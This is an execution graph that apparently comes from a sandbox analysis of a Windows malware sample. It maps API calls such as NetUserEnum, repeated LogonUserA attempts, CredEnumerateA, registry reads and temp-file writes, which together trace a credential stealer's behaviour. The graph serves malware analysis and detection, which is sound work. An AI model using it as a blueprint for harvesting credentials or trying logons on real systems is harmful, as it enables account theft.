                                                                                                                                        execution_graph 6102 bc04c40 6122 bc0491e 6102->6122 6105 bc04cf2 6106 bc04e08 6105->6106 6107 bc04d0a lstrcmpiA 6105->6107 6108 bc09fdc __except_handler4 5 API calls 6106->6108 6110 bc04d29 lstrcmpiA 6107->6110 6111 bc04dfc CoTaskMemFree 6107->6111 6109 bc04e15 6108->6109 6110->6111 6112 bc04d42 lstrcmpiA 6110->6112 6111->6106 6112->6111 6113 bc04d5b StrStrIA 6112->6113 6114 bc04d71 6113->6114 6115 bc04dd7 6113->6115 6116 bc01000 2 API calls 6114->6116 6117 bc04b07 lstrlenW 6115->6117 6118 bc04d9d 6116->6118 6119 bc04df9 6117->6119 6118->6111 6120 bc04b07 lstrlenW 6118->6120 6119->6111 6121 bc04dc6 LocalFree 6120->6121 6121->6111 6123 bc04934 6122->6123 6124 bc04938 WideCharToMultiByte CoTaskMemFree 6123->6124 6125 bc0495b WideCharToMultiByte 6123->6125 6124->6125 6125->6105 6244 bc02d22 6245 bc02d36 6244->6245 6260 bc02ef9 6244->6260 6246 bc02d83 lstrcmpA 6245->6246 6245->6260 6247 bc02d97 6246->6247 6248 bc01000 2 API calls 6247->6248 6249 bc02ddd 6248->6249 6250 bc08d91 2 API calls 6249->6250 6249->6260 6251 bc02e11 LocalFree 6250->6251 6252 bc02e29 6251->6252 6251->6260 6252->6260 6262 bc08d51 LocalAlloc 6252->6262 6254 bc02e39 6255 bc08d91 2 API calls 6254->6255 6256 bc02e48 lstrlenA StrCmpNIA 6255->6256 6257 bc02e67 lstrlenA StrCmpNIA 6256->6257 6261 bc02e8d 6256->6261 6258 bc02e7a lstrlenA StrCmpNIA 6257->6258 6257->6261 6258->6261 6259 bc08d3d LocalFree 6259->6260 6261->6259 6262->6254 6161 bc069e3 6162 bc09af4 lstrlenA 6161->6162 6163 bc069f3 StrStrIA 6162->6163 6164 bc06a0c 6163->6164 6168 bc06a05 6163->6168 6165 bc09af4 lstrlenA 6164->6165 6166 bc06a14 6165->6166 6167 bc06a40 lstrcmpiA 6166->6167 6169 bc06a51 lstrlenA 6166->6169 6167->6166 6167->6168 6169->6168 6170 bc06a60 lstrcmpiA 6169->6170 6170->6168 6171 bc06a76 lstrcmpiA 6170->6171 6171->6168 6172 bc06a8c lstrcmpiA 6171->6172 6172->6168 4512 bc01067 4513 bc01074 4512->4513 4526 bc09df5 GetPEB 4513->4526 4516 bc010a5 4577 bc08d3d 4516->4577 4517 bc010b8 OleInitialize 4530 bc01153 WSAStartup LocalAlloc 4517->4530 4529 bc09ec9 4526->4529 4528 bc0107b LocalAlloc GetUserNameA 4528->4516 4528->4517 4580 bc09fdc 4529->4580 4540 bc011af 4530->4540 4531 bc0121f CreateStreamOnHGlobal 4532 bc01255 4531->4532 4533 bc0123b CreateStreamOnHGlobal 4531->4533 4589 bc01431 4532->4589 4533->4532 4534 bc0140c 4533->4534 4538 bc09fdc __except_handler4 5 API calls 4534->4538 4539 bc010c5 4538->4539 4553 bc01507 4539->4553 4540->4531 4611 bc08d51 LocalAlloc 4540->4611 4541 bc01431 249 API calls 4542 bc01267 4541->4542 4544 bc01431 249 API calls 4542->4544 4547 bc01272 4542->4547 4543 bc012bc GetHGlobalFromStream 4543->4547 4544->4547 4545 bc013d9 Sleep 4545->4547 4546 bc012dd GlobalLock 4546->4547 4547->4534 4547->4543 4547->4545 4547->4546 4548 bc01355 GlobalUnlock 4547->4548 4549 bc01bf7 35 API calls 4547->4549 4551 bc08d3d LocalFree 4547->4551 4552 bc010d8 8 API calls 4547->4552 4612 bc0973a GetHGlobalFromStream 4547->4612 4548->4547 4549->4547 4551->4547 4552->4547 4554 bc0151e NetUserEnum 4553->4554 4557 bc01542 4554->4557 4555 bc015b1 NetApiBufferFree 4555->4557 4556 bc010ca 4560 bc015d2 4556->4560 4557->4554 4557->4555 4557->4556 4558 bc09be0 LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 4557->4558 4559 bc0157c LocalAlloc 4557->4559 4558->4557 4559->4557 4569 bc015e9 4560->4569 4562 bc01646 lstrcmpiA 4563 bc01658 LogonUserA 4562->4563 4562->4569 4564 bc01704 LoadUserProfileA 4563->4564 4563->4569 4564->4569 4565 bc010cf ExitProcess 4567 bc0174d ImpersonateLoggedOnUser 4567->4569 4568 bc0167d lstrlenA LCMapStringA 4568->4569 4570 bc016a6 LogonUserA 4568->4570 4569->4562 4569->4563 4569->4564 4569->4565 4569->4567 4571 bc01153 290 API calls 4569->4571 4572 bc01780 CloseHandle 4569->4572 4573 bc01774 UnloadUserProfile 4569->4573 4574 bc08d3d LocalFree 4569->4574 4576 bc016d4 LogonUserA 4569->4576 6090 bc09b51 LookupPrivilegeValueA 4569->6090 6098 bc091e5 lstrlenA 4569->6098 4570->4569 4575 bc0175f RevertToSelf 4571->4575 4572->4569 4573->4572 4574->4569 4575->4569 4576->4564 4576->4569 4578 bc08d46 LocalFree 4577->4578 4579 bc010b0 4577->4579 4578->4579 4579->4517 4581 bc09fe4 4580->4581 4582 bc09fe6 IsDebuggerPresent 4580->4582 4581->4528 4588 bc0a0f4 4582->4588 4585 bc0a0bb SetUnhandledExceptionFilter UnhandledExceptionFilter 4586 bc0a0e0 GetCurrentProcess TerminateProcess 4585->4586 4587 bc0a0d8 __except_handler4 4585->4587 4586->4528 4587->4586 4588->4585 4590 bc01452 4589->4590 4625 bc01dc2 4590->4625 4592 bc01486 4595 bc09fdc __except_handler4 5 API calls 4592->4595 4593 bc0147a 4593->4592 4649 bc09380 GetHGlobalFromStream 4593->4649 4597 bc0125c 4595->4597 4596 bc01491 4596->4592 4663 bc09209 GetHGlobalFromStream 4596->4663 4597->4541 4597->4547 4599 bc0149c 4599->4592 4670 bc09283 GetHGlobalFromStream 4599->4670 4601 bc014a7 4601->4592 4677 bc09539 GetHGlobalFromStream 4601->4677 4604 bc09209 8 API calls 4605 bc014bd 4604->4605 4605->4592 4606 bc09283 8 API calls 4605->4606 4607 bc014c8 4606->4607 4607->4592 4608 bc014cc 4607->4608 4690 bc0962f GetTickCount GetHGlobalFromStream 4608->4690 4610 bc014d3 4610->4592 4611->4540 4613 bc0976f 4612->4613 4614 bc097f5 4612->4614 4613->4614 4616 bc0977d GlobalLock 4613->4616 4615 bc09fdc __except_handler4 5 API calls 4614->4615 4618 bc09810 4615->4618 4616->4614 4617 bc09793 4616->4617 6089 bc08d51 LocalAlloc 4617->6089 4618->4547 4620 bc0979a 4621 bc08d91 2 API calls 4620->4621 4622 bc097a9 GlobalUnlock 4621->4622 4623 bc097c3 4622->4623 4624 bc08d3d LocalFree 4623->4624 4624->4614 4626 bc01dce 4625->4626 4703 bc02741 4626->4703 4628 bc01ec6 4628->4593 4629 bc01ddc 4629->4628 4736 bc02213 4629->4736 4771 bc073b2 4629->4771 4784 bc061af 4629->4784 4789 bc0582c 4629->4789 4794 bc06dab 4629->4794 4804 bc06007 4629->4804 4849 bc05547 4629->4849 4861 bc04125 4629->4861 4906 bc07461 4629->4906 4917 bc03f20 4629->4917 4942 bc0585e 4629->4942 4947 bc06f5f 4629->4947 4982 bc02eff 4629->4982 4987 bc0441f 4629->4987 5058 bc048de 4629->5058 5065 bc02a37 4629->5065 5070 bc06e59 4629->5070 5084 bc03c57 4629->5084 5101 bc03c33 4629->5101 4650 bc093a2 4649->4650 4651 bc09459 4649->4651 4652 bc093a9 GlobalLock 4650->4652 4651->4596 4652->4651 4653 bc093c1 4652->4653 6085 bc08d51 LocalAlloc 4653->6085 4655 bc093d2 6086 bc08d51 LocalAlloc 4655->6086 4657 bc093e6 4658 bc093f6 GlobalUnlock 4657->4658 4659 bc0940c 4658->4659 4660 bc08d3d LocalFree 4659->4660 4661 bc09450 4660->4661 4662 bc08d3d LocalFree 4661->4662 4662->4651 4664 bc09222 4663->4664 4665 bc0924d 4663->4665 4666 bc0922a GlobalLock 4664->4666 4665->4599 4666->4665 4667 bc09239 4666->4667 4668 bc0930f 5 API calls 4667->4668 4669 bc09241 GlobalUnlock 4668->4669 4669->4665 4671 bc0929f 4670->4671 4676 bc092d3 4670->4676 4672 bc092ad GlobalLock 4671->4672 4671->4676 4673 bc092ba 4672->4673 4672->4676 4674 bc0930f 5 API calls 4673->4674 4675 bc092c5 GlobalUnlock 4674->4675 4675->4676 4676->4601 4678 bc0956e 4677->4678 4680 bc09612 4677->4680 4679 bc09575 GlobalLock 4678->4679 4679->4680 4681 bc09593 4679->4681 4682 bc09fdc __except_handler4 5 API calls 4680->4682 6087 bc08d51 LocalAlloc 4681->6087 4684 bc014b2 4682->4684 4684->4592 4684->4604 4685 bc0959a 4686 bc08d91 2 API calls 4685->4686 4687 bc095a8 GlobalUnlock lstrlenA 4686->4687 4688 bc095cd 4687->4688 4689 bc08d3d LocalFree 4688->4689 4689->4680 4691 bc09681 4690->4691 4692 bc0971d 4690->4692 4693 bc09688 GlobalLock 4691->4693 4694 bc09fdc __except_handler4 5 API calls 4692->4694 4693->4692 4695 bc096a2 4693->4695 4697 bc09738 4694->4697 6088 bc08d51 LocalAlloc 4695->6088 4697->4610 4698 bc096a9 4699 bc08d91 2 API calls 4698->4699 4700 bc096b7 GlobalUnlock 4699->4700 4701 bc096d7 4700->4701 4702 bc08d3d LocalFree 4701->4702 4702->4692 5106 bc08c9c 4703->5106 4705 bc02760 4706 bc02794 GetVersionExA 4705->4706 4708 bc027bb 4706->4708 4707 bc027f2 GetModuleHandleA 4709 bc02848 4707->4709 4710 bc0280b GetProcAddress 4707->4710 4708->4707 4714 bc0284f LocalAlloc GetLocaleInfoA 4709->4714 4710->4709 4711 bc0281d GetProcAddress 4710->4711 4712 bc0283b 4711->4712 4713 bc0282b GetCurrentProcess 4711->4713 4712->4709 4713->4712 4716 bc02886 4714->4716 4715 bc028a5 GetLocaleInfoA 4717 bc028bf 4715->4717 4716->4715 4718 bc028d6 AllocateAndInitializeSid 4717->4718 4719 bc0290d CheckTokenMembership 4718->4719 4721 bc02909 4718->4721 4720 bc02925 FreeSid 4719->4720 4719->4721 4720->4721 5110 bc026a0 4721->5110 4725 bc08d3d LocalFree 4726 bc029b3 4725->4726 4727 bc08d3d LocalFree 4726->4727 4729 bc029be GetModuleHandleA 4727->4729 4728 bc0294c 4728->4725 4730 bc029ea GetSystemInfo 4729->4730 4731 bc029cf GetProcAddress 4729->4731 4733 bc029f7 4730->4733 4731->4730 4732 bc029df GetNativeSystemInfo 4731->4732 4732->4733 4734 bc09fdc __except_handler4 5 API calls 4733->4734 4735 bc02a35 4734->4735 4735->4629 4737 bc08c9c 5 API calls 4736->4737 4738 bc02225 4737->4738 5230 bc023a1 4738->5230 4741 bc08ebd 6 API calls 4742 bc0224b 4741->4742 4743 bc02266 4742->4743 5256 bc0231e 4742->5256 4745 bc08dda 6 API calls 4743->4745 4747 bc0227e 4745->4747 4749 bc02299 4747->4749 4751 bc0231e 26 API calls 4747->4751 4748 bc08d3d LocalFree 4748->4743 4750 bc08dda 6 API calls 4749->4750 4752 bc022a9 4750->4752 4753 bc02290 4751->4753 4754 bc022c1 4752->4754 4756 bc0231e 26 API calls 4752->4756 4755 bc08d3d LocalFree 4753->4755 4757 bc08dda 6 API calls 4754->4757 4755->4749 4758 bc022ba 4756->4758 4759 bc022d4 4757->4759 4760 bc08d3d LocalFree 4758->4760 4761 bc022ec 4759->4761 4763 bc0231e 26 API calls 4759->4763 4760->4754 5247 bc02516 4761->5247 4765 bc022e5 4763->4765 4767 bc08d3d LocalFree 4765->4767 4766 bc02516 32 API calls 4768 bc02301 4766->4768 4767->4761 4769 bc02516 32 API calls 4768->4769 4770 bc0230b 4769->4770 4770->4629 4772 bc08c9c 5 API calls 4771->4772 4773 bc073c7 CredEnumerateA 4772->4773 4774 bc07424 4773->4774 4779 bc073eb 4773->4779 5364 bc091be LocalAlloc SHGetFolderPathA 4774->5364 4776 bc0742b 4777 bc07451 4776->4777 5365 bc01fd3 4776->5365 4777->4629 4778 bc0741b CredFree 4778->4774 4779->4774 4779->4778 5390 bc07121 4779->5390 4783 bc08d3d LocalFree 4783->4777 4785 bc08c9c 5 API calls 4784->4785 4786 bc061bf 4785->4786 5493 bc02a67 4786->5493 4788 bc061cf 4788->4629 4790 bc08c9c 5 API calls 4789->4790 4791 bc0583a 4790->4791 5516 bc057c3 4791->5516 4793 bc05850 4793->4629 4795 bc08c9c 5 API calls 4794->4795 4796 bc06dd1 GetCurrentDirectoryA 4795->4796 5537 bc0689e StrStrIA 4796->5537 4799 bc0689e 91 API calls 4800 bc06e29 SetCurrentDirectoryA 4799->4800 4801 bc06e4a 4800->4801 4802 bc09fdc __except_handler4 5 API calls 4801->4802 4803 bc06e57 4802->4803 4803->4629 5673 bc088c9 lstrlenA LocalAlloc lstrcpyA 4804->5673 4807 bc088c9 8 API calls 4808 bc06036 4807->4808 4809 bc088c9 8 API calls 4808->4809 4810 bc0604d 4809->4810 4811 bc088c9 8 API calls 4810->4811 4812 bc06064 4811->4812 4813 bc088c9 8 API calls 4812->4813 4814 bc0607b 4813->4814 4815 bc08c9c 5 API calls 4814->4815 4816 bc06094 LoadLibraryA 4815->4816 4817 bc060e1 4816->4817 4818 bc060a9 GetProcAddress 4816->4818 5677 bc05b39 RegOpenKeyA 4817->5677 4820 bc060be 4818->4820 4820->4817 5699 bc04a80 4820->5699 4822 bc08ee2 5 API calls 4823 bc060f9 4822->4823 5688 bc05c29 RegOpenKeyA 4823->5688 4828 bc08d3d LocalFree 4829 bc0610e 4828->4829 4830 bc08dda 6 API calls 4829->4830 4831 bc06126 4830->4831 4832 bc06147 4831->4832 4833 bc08f32 6 API calls 4831->4833 4834 bc05b39 33 API calls 4832->4834 4835 bc06138 4833->4835 4836 bc06153 4834->4836 4837 bc05b39 33 API calls 4835->4837 4838 bc05c29 36 API calls 4836->4838 4840 bc06141 4837->4840 4839 bc0615e 4838->4839 4841 bc05c29 36 API calls 4839->4841 4842 bc08d3d LocalFree 4840->4842 4843 bc06169 4841->4843 4842->4832 4844 bc05c29 36 API calls 4843->4844 4845 bc06174 4844->4845 4846 bc05c29 36 API calls 4845->4846 4847 bc0617f 4846->4847 4848 bc0618b LocalFree LocalFree LocalFree LocalFree LocalFree 4847->4848 4848->4629 4850 bc08c9c 5 API calls 4849->4850 4851 bc05565 LoadLibraryA GetProcAddress 4850->4851 4852 bc0558c 4851->4852 4854 bc04a80 CoTaskMemFree 4852->4854 4856 bc055a5 4852->4856 4854->4856 5772 bc0509b CoCreateInstance 4856->5772 4860 bc055c6 4860->4629 4862 bc08c9c 5 API calls 4861->4862 4863 bc04136 4862->4863 5866 bc03fd6 4863->5866 4866 bc03fd6 35 API calls 4867 bc04168 4866->4867 4868 bc03fd6 35 API calls 4867->4868 4869 bc04178 4868->4869 4870 bc03fd6 35 API calls 4869->4870 4871 bc04188 4870->4871 4872 bc03fd6 35 API calls 4871->4872 4873 bc04199 4872->4873 4874 bc03fd6 35 API calls 4873->4874 4875 bc041ac 4874->4875 4876 bc03fd6 35 API calls 4875->4876 4877 bc041bc 4876->4877 4878 bc03fd6 35 API calls 4877->4878 4879 bc041cc 4878->4879 4880 bc03fd6 35 API calls 4879->4880 4881 bc041df 4880->4881 4882 bc03fd6 35 API calls 4881->4882 4883 bc041f3 4882->4883 4884 bc03fd6 35 API calls 4883->4884 4885 bc04207 4884->4885 4886 bc03fd6 35 API calls 4885->4886 4887 bc0421e 4886->4887 4888 bc03fd6 35 API calls 4887->4888 4889 bc0422e 4888->4889 4890 bc03fd6 35 API calls 4889->4890 4891 bc0423e 4890->4891 4892 bc03fd6 35 API calls 4891->4892 4893 bc0424e 4892->4893 4894 bc03fd6 35 API calls 4893->4894 4895 bc0425e 4894->4895 4896 bc03fd6 35 API calls 4895->4896 4897 bc04273 4896->4897 4898 bc03fd6 35 API calls 4897->4898 4899 bc04287 4898->4899 5887 bc040cd 4899->5887 4902 bc040cd 32 API calls 4903 bc04297 4902->4903 4904 bc040cd 32 API calls 4903->4904 4905 bc0429f 4904->4905 4905->4629 4907 bc08c9c 5 API calls 4906->4907 4908 bc07477 4907->4908 5924 bc091be LocalAlloc SHGetFolderPathA 4908->5924 4910 bc07481 4911 bc08f32 6 API calls 4910->4911 4912 bc0748e CreateStreamOnHGlobal 4911->4912 4913 bc08a86 8 API calls 4912->4913 4914 bc074a9 4913->4914 4915 bc037e4 14 API calls 4914->4915 4916 bc074bf 4914->4916 4915->4916 4916->4629 4918 bc08c9c 5 API calls 4917->4918 4919 bc03f32 4918->4919 5925 bc03e8c 4919->5925 4922 bc03e8c 37 API calls 4923 bc03f44 4922->4923 4924 bc03e8c 37 API calls 4923->4924 4925 bc03f4c 4924->4925 4926 bc03e8c 37 API calls 4925->4926 4927 bc03f54 4926->4927 5954 bc03cdf 4927->5954 4930 bc03cdf 6 API calls 4931 bc03f6c 4930->4931 4932 bc03cdf 6 API calls 4931->4932 4933 bc03f77 4932->4933 4934 bc03cdf 6 API calls 4933->4934 4935 bc03f82 4934->4935 4936 bc03cdf 6 API calls 4935->4936 4937 bc03f8d 4936->4937 4938 bc03cdf 6 API calls 4937->4938 4939 bc03f98 4938->4939 4940 bc03cdf 6 API calls 4939->4940 4941 bc03fa3 4940->4941 4941->4629 4943 bc08c9c 5 API calls 4942->4943 4944 bc0586c 4943->4944 4945 bc057c3 54 API calls 4944->4945 4946 bc05882 4945->4946 4946->4629 4948 bc08c9c 5 API calls 4947->4948 4949 bc06f75 LocalAlloc LocalAlloc LocalAlloc FindWindowExA 4948->4949 4950 bc06fb6 FindWindowExA 4949->4950 4958 bc0707c 4949->4958 4951 bc06fcb FindWindowExA 4950->4951 4950->4958 4952 bc07043 FindWindowExA 4951->4952 4953 bc06fdc SendMessageA FindWindowExA 4951->4953 4957 bc07048 GetClassNameA 4952->4957 4952->4958 4955 bc07001 SendMessageA 4953->4955 4953->4958 4954 bc08d3d LocalFree 4959 bc07109 4954->4959 4955->4958 4960 bc07013 4955->4960 4957->4952 4961 bc07059 StrStrIA 4957->4961 4958->4954 4962 bc08d3d LocalFree 4959->4962 4967 bc08c6d lstrlenA 4960->4967 4961->4952 4963 bc0707e SendMessageW 4961->4963 4964 bc07111 4962->4964 4965 bc09be0 4 API calls 4963->4965 4966 bc08d3d LocalFree 4964->4966 4968 bc0709a 4965->4968 4969 bc07119 4966->4969 4970 bc07031 4967->4970 4971 bc08d3d LocalFree 4968->4971 4969->4629 4972 bc08c6d lstrlenA 4970->4972 4973 bc070a3 FindWindowExA SendMessageW 4971->4973 4981 bc0703b 4972->4981 4974 bc09be0 4 API calls 4973->4974 4975 bc070c2 4974->4975 4976 bc08d3d LocalFree 4975->4976 4977 bc070cb 4976->4977 4978 bc08c6d lstrlenA 4977->4978 4979 bc070e9 4978->4979 4980 bc08c6d lstrlenA 4979->4980 4980->4981 4981->4958 4983 bc08c9c 5 API calls 4982->4983 4984 bc02f0f 4983->4984 4985 bc02a67 50 API calls 4984->4985 4986 bc02f1f 4985->4986 4986->4629 4988 bc08c9c 5 API calls 4987->4988 4989 bc04433 LocalAlloc GetWindowsDirectoryA 4988->4989 4990 bc04466 4989->4990 4991 bc04458 4989->4991 4992 bc08d3d LocalFree 4990->4992 4991->4990 4993 bc0445c 4991->4993 4994 bc04463 4992->4994 5986 bc042c9 4993->5986 6040 bc091be LocalAlloc SHGetFolderPathA 4994->6040 4997 bc04474 4998 bc042c9 35 API calls 4997->4998 4999 bc0447b 4998->4999 6041 bc091be LocalAlloc SHGetFolderPathA 4999->6041 5001 bc04482 5002 bc0449c 5001->5002 5003 bc08f32 6 API calls 5001->5003 6042 bc091be LocalAlloc SHGetFolderPathA 5002->6042 5005 bc04495 5003->5005 5008 bc042c9 35 API calls 5005->5008 5006 bc044a6 5007 bc044b9 5006->5007 5009 bc08f32 6 API calls 5006->5009 6043 bc091be LocalAlloc SHGetFolderPathA 5007->6043 5008->5002 5011 bc044b2 5009->5011 5013 bc042c9 35 API calls 5011->5013 5012 bc044c3 5014 bc044d6 5012->5014 5015 bc08f32 6 API calls 5012->5015 5013->5007 5016 bc08ebd 6 API calls 5014->5016 5017 bc044cf 5015->5017 5018 bc044f2 5016->5018 5020 bc042c9 35 API calls 5017->5020 5019 bc042c9 35 API calls 5018->5019 5021 bc044f9 5019->5021 5020->5014 5022 bc08ebd 6 API calls 5021->5022 5023 bc0450d 5022->5023 5024 bc04528 5023->5024 6044 bc042b1 5023->6044 5026 bc08ebd 6 API calls 5024->5026 5028 bc0453a 5026->5028 5030 bc042c9 35 API calls 5028->5030 5029 bc08d3d LocalFree 5029->5024 5031 bc04543 5030->5031 5032 bc08ebd 6 API calls 5031->5032 5033 bc04552 5032->5033 5034 bc0456a 5033->5034 5035 bc042b1 22 API calls 5033->5035 5036 bc08dda 6 API calls 5034->5036 5037 bc04564 5035->5037 5038 bc04582 5036->5038 5039 bc08d3d LocalFree 5037->5039 5040 bc042c9 35 API calls 5038->5040 5039->5034 5041 bc0458b 5040->5041 5042 bc08dda 6 API calls 5041->5042 5043 bc0459b 5042->5043 5044 bc045b6 5043->5044 5046 bc042b1 22 API calls 5043->5046 5045 bc08dda 6 API calls 5044->5045 5047 bc045ca 5045->5047 5048 bc045ae 5046->5048 5049 bc042c9 35 API calls 5047->5049 5050 bc08d3d LocalFree 5048->5050 5051 bc045d3 5049->5051 5050->5044 5052 bc08dda 6 API calls 5051->5052 5053 bc045df 5052->5053 5054 bc045f7 5053->5054 5055 bc042b1 22 API calls 5053->5055 5054->4629 5056 bc045f1 5055->5056 5057 bc08d3d LocalFree 5056->5057 5057->5054 5059 bc08c9c 5 API calls 5058->5059 5060 bc048f0 5059->5060 6047 bc0460a RegOpenKeyA 5060->6047 5063 bc0460a 19 API calls 5064 bc0490f 5063->5064 5064->4629 5066 bc08c9c 5 API calls 5065->5066 5067 bc02a47 5066->5067 5068 bc02a67 50 API calls 5067->5068 5069 bc02a57 5068->5069 5069->4629 5071 bc08c9c 5 API calls 5070->5071 5072 bc06e7f GetCurrentDirectoryA 5071->5072 5073 bc0689e 91 API calls 5072->5073 5074 bc06ec4 5073->5074 5075 bc0689e 91 API calls 5074->5075 5076 bc06eda SetCurrentDirectoryA GetCurrentDirectoryA 5075->5076 5077 bc0689e 91 API calls 5076->5077 5078 bc06f19 5077->5078 5079 bc0689e 91 API calls 5078->5079 5080 bc06f2f SetCurrentDirectoryA 5079->5080 5081 bc06f50 5080->5081 5082 bc09fdc __except_handler4 5 API calls 5081->5082 5083 bc06f5d 5082->5083 5083->4629 5085 bc08c9c 5 API calls 5084->5085 5086 bc03c6b 5085->5086 6060 bc02175 5086->6060 5089 bc02175 50 API calls 5090 bc03c7f 5089->5090 5091 bc02175 50 API calls 5090->5091 5092 bc03c87 5091->5092 5093 bc08dda 6 API calls 5092->5093 5094 bc03ca0 5093->5094 5095 bc08f32 6 API calls 5094->5095 5096 bc03ccf 5094->5096 5097 bc03cb2 5095->5097 5096->4629 5098 bc01fd3 48 API calls 5097->5098 5099 bc03cc6 5098->5099 5100 bc08d3d LocalFree 5099->5100 5100->5096 5102 bc08c9c 5 API calls 5101->5102 5103 bc03c41 5102->5103 6070 bc03972 RegOpenKeyA 5103->6070 5105 bc03c4c 5105->4629 5107 bc08cbc 5106->5107 5108 bc09fdc __except_handler4 5 API calls 5107->5108 5109 bc08d0a 5108->5109 5109->4705 5111 bc099b0 30 API calls 5110->5111 5112 bc026b9 5111->5112 5113 bc026cc CoCreateGuid 5112->5113 5114 bc026c4 5112->5114 5115 bc026da wsprintfA lstrlenA 5113->5115 5120 bc026ca 5113->5120 5118 bc08d3d LocalFree 5114->5118 5150 bc09812 RegCreateKeyA 5115->5150 5117 bc09fdc __except_handler4 5 API calls 5119 bc0273f 5117->5119 5118->5120 5121 bc099b0 5119->5121 5120->5117 5196 bc08ebd 5121->5196 5124 bc099eb GetTempPathA 5126 bc09acf 5124->5126 5127 bc09a07 5124->5127 5125 bc09fdc __except_handler4 5 API calls 5128 bc09af2 5125->5128 5126->5125 5127->5126 5129 bc09a0f CreateStreamOnHGlobal 5127->5129 5128->4728 5130 bc08f95 lstrlenA 5129->5130 5131 bc09a2b 5130->5131 5132 bc09a32 5131->5132 5133 bc09a48 5131->5133 5134 bc08ee2 5 API calls 5132->5134 5135 bc08ee2 5 API calls 5133->5135 5136 bc09a3c 5134->5136 5137 bc09a43 5135->5137 5138 bc08f32 6 API calls 5136->5138 5200 bc08a86 5137->5200 5138->5137 5140 bc09a62 5141 bc09ac4 5140->5141 5143 bc09a78 GetHGlobalFromStream 5140->5143 5142 bc08d3d LocalFree 5141->5142 5142->5126 5143->5141 5144 bc09a8f GlobalLock 5143->5144 5144->5141 5145 bc09aa1 5144->5145 5210 bc08d51 LocalAlloc 5145->5210 5147 bc09aa8 5211 bc08d91 GetModuleHandleA GetProcAddress 5147->5211 5151 bc09893 GetTempPathA 5150->5151 5152 bc09859 RegSetValueExA 5150->5152 5153 bc098ae 5151->5153 5176 bc0999a 5151->5176 5154 bc09871 5152->5154 5155 bc0987b RegCloseKey 5152->5155 5156 bc098b6 CreateDirectoryA 5153->5156 5153->5176 5154->5155 5155->5151 5155->5176 5177 bc08f95 5156->5177 5157 bc09fdc __except_handler4 5 API calls 5159 bc099ae 5157->5159 5159->5120 5161 bc098d6 5181 bc08ee2 5161->5181 5162 bc098ee 5164 bc08ee2 5 API calls 5162->5164 5166 bc098e9 CreateFileA 5164->5166 5165 bc098e0 5186 bc08f32 5165->5186 5169 bc09983 DeleteFileA 5166->5169 5173 bc0991a 5166->5173 5170 bc0998f 5169->5170 5172 bc08d3d LocalFree 5170->5172 5171 bc0991f WriteFile 5171->5173 5174 bc0995d CloseHandle 5171->5174 5172->5176 5173->5171 5173->5174 5174->5169 5174->5170 5176->5157 5178 bc08fac 5177->5178 5179 bc08f99 5177->5179 5178->5161 5178->5162 5179->5178 5180 bc08f9e lstrlenA 5179->5180 5180->5178 5182 bc08ef5 lstrlenA lstrlenA 5181->5182 5194 bc08d51 LocalAlloc 5182->5194 5185 bc08f17 lstrcpyA lstrcatA 5185->5165 5187 bc08f43 lstrlenA lstrlenA 5186->5187 5195 bc08d51 LocalAlloc 5187->5195 5190 bc08f6a lstrcpyA lstrcatA 5191 bc08f85 5190->5191 5192 bc08f8d 5190->5192 5193 bc08d3d LocalFree 5191->5193 5192->5166 5193->5192 5194->5185 5195->5190 5197 bc08ec7 5196->5197 5213 bc08dda 5197->5213 5228 bc0b780 5200->5228 5203 bc08ac4 5205 bc09fdc __except_handler4 5 API calls 5203->5205 5204 bc08ad5 ReadFile 5206 bc08b16 FindCloseChangeNotification 5204->5206 5208 bc08ad4 5204->5208 5207 bc08ad2 5205->5207 5206->5203 5207->5140 5208->5204 5209 bc08b13 5208->5209 5209->5206 5210->5147 5212 bc08db6 GlobalUnlock 5211->5212 5212->5141 5214 bc08dee RegOpenKeyExA 5213->5214 5216 bc08e24 RegQueryValueExA 5214->5216 5217 bc08e98 5214->5217 5218 bc08e41 5216->5218 5219 bc08e89 RegCloseKey 5216->5219 5220 bc08eb0 5217->5220 5221 bc08dda 2 API calls 5217->5221 5218->5219 5227 bc08d51 LocalAlloc 5218->5227 5219->5217 5219->5220 5220->5124 5220->5126 5221->5220 5223 bc08e59 RegQueryValueExA 5224 bc08e6f 5223->5224 5226 bc08e77 5223->5226 5225 bc08d3d LocalFree 5224->5225 5225->5226 5226->5219 5227->5223 5229 bc08a93 CreateFileA 5228->5229 5229->5203 5229->5208 5276 bc0254b 5230->5276 5233 bc0254b 7 API calls 5234 bc02423 5233->5234 5235 bc0254b 7 API calls 5234->5235 5236 bc02456 RegOpenKeyA 5235->5236 5237 bc02474 5236->5237 5238 bc02507 5236->5238 5240 bc024e5 RegEnumKeyExA 5237->5240 5243 bc08ee2 5 API calls 5237->5243 5244 bc08f32 6 API calls 5237->5244 5245 bc023a1 20 API calls 5237->5245 5246 bc08d3d LocalFree 5237->5246 5239 bc09fdc __except_handler4 5 API calls 5238->5239 5242 bc02237 5239->5242 5240->5237 5241 bc024fb RegCloseKey 5240->5241 5241->5238 5242->4741 5243->5237 5244->5237 5245->5237 5246->5237 5314 bc091be LocalAlloc SHGetFolderPathA 5247->5314 5249 bc02523 5250 bc08f32 6 API calls 5249->5250 5255 bc022f7 5249->5255 5251 bc02533 5250->5251 5252 bc0231e 26 API calls 5251->5252 5253 bc0253d 5252->5253 5254 bc08d3d LocalFree 5253->5254 5254->5255 5255->4766 5257 bc0232a 5256->5257 5258 bc0225d 5256->5258 5259 bc08ee2 5 API calls 5257->5259 5258->4748 5260 bc02335 5259->5260 5315 bc01f01 5260->5315 5263 bc08d3d LocalFree 5264 bc0234f 5263->5264 5265 bc08ee2 5 API calls 5264->5265 5266 bc0235b 5265->5266 5267 bc01f01 22 API calls 5266->5267 5268 bc0236c 5267->5268 5269 bc08d3d LocalFree 5268->5269 5270 bc02375 5269->5270 5271 bc08ee2 5 API calls 5270->5271 5272 bc02381 5271->5272 5273 bc01f01 22 API calls 5272->5273 5274 bc02392 5273->5274 5275 bc08d3d LocalFree 5274->5275 5275->5258 5277 bc08ebd 6 API calls 5276->5277 5278 bc02569 5277->5278 5279 bc08ebd 6 API calls 5278->5279 5280 bc02578 5279->5280 5281 bc08ebd 6 API calls 5280->5281 5282 bc02587 5281->5282 5283 bc08ebd 6 API calls 5282->5283 5284 bc02599 5283->5284 5285 bc08ebd 6 API calls 5284->5285 5286 bc025a8 5285->5286 5287 bc08ebd 6 API calls 5286->5287 5292 bc025ba 5287->5292 5288 bc08d3d LocalFree 5289 bc02670 5288->5289 5290 bc08d3d LocalFree 5289->5290 5291 bc02678 5290->5291 5293 bc08d3d LocalFree 5291->5293 5310 bc02643 5292->5310 5311 bc08c6d 5292->5311 5295 bc02680 